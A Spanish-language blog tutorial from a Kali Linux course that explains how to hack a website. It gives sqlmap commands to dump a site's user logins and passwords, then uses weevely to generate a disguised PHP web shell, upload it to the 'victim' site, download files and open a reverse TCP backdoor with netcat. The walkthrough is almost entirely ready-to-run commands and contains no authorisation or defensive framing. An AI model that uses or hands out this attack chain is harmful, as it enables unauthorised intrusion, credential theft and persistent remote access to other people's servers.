Categor铆as: [Curso] Kali Linux

Kali linux hackear una pagina web y manipularla desde kali linux ?

1.- Vamos a obtener la bd

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Esto nos debe de regresar algo asi

2.- Ahora vamos a sacar las tablas de la bd聽photoblog que obtuvimos previamente

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Este es el resultado

3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla聽users asi:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Este es el resultado:

4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

Listo hemos obtenido el usuario y password.

2.- Una vez obtenida el usuario y contrase帽a procedemos a instalar la herramienta聽PySocks la cual nos ayudara a iniciar la conexi贸n entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
3.- Ahora usaremos聽weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git 
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo
En caso de que el anterior comando de errores quizas falta instalar dependencias como se muestra aqui
Subimos el archivo web.php.jpx a la pagina victima
Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png
Para mayor comodidad podemos crear un聽TCP reverse backdoor asi:
nc -l -p 5412
:backdoor_reversetcp
192.168.8.103
5412
Donde
192.168.8.103 La ip de nustro kali

Eugenio Chaparro

Ver comentarios

  • muy buen tutorial ahora lo voy a probar en practica
    saludos!

Compartir
Publicado por
Eugenio Chaparro

Entradas recientes

馃煝Editar c贸digo de un m贸dulo en Dolibarr [04]

馃煝Editar c贸digo de un m贸dulo en Dolibarr [04]

En este tutorial vamos editar el c贸digo de nuestro m贸dulo personas para poder personalizar algunas…

2 meses hace
馃煝Crear un sub_m贸dulo en Dolibarr [03]

馃煝Crear un sub_m贸dulo en Dolibarr [03]

En este tutorial vamos a crear un sub m贸dulo llamado seguridad que ser谩 muy parecido…

2 meses hace
馃煝Modificar un m贸dulo en Dolibarr [02]

馃煝Modificar un m贸dulo en Dolibarr [02]

En este tutorial aprenderemos a editar el objeto personas del modulo persona que creamos en…

2 meses hace
馃煝Constructor de m贸dulos en Dolibarr

馃煝Constructor de m贸dulos en Dolibarr

Como mencionamos anteriormente Dolibarr es un proyecto realizado sobre la base de una pol铆tica clara:…

2 meses hace
馃煝Tickets en Dolibarr [19]

馃煝Tickets en Dolibarr [19]

Los ticket en dolibarr nos ayudan a comunicar inconveniente en nuestros productos y servicios dentro…

2 meses hace
馃煝Agenda en Dolibarr [18]

馃煝Agenda en Dolibarr [18]

Las agendas en dolibarr nos ayudan a ver las actividades realizadas en proceso y por…

2 meses hace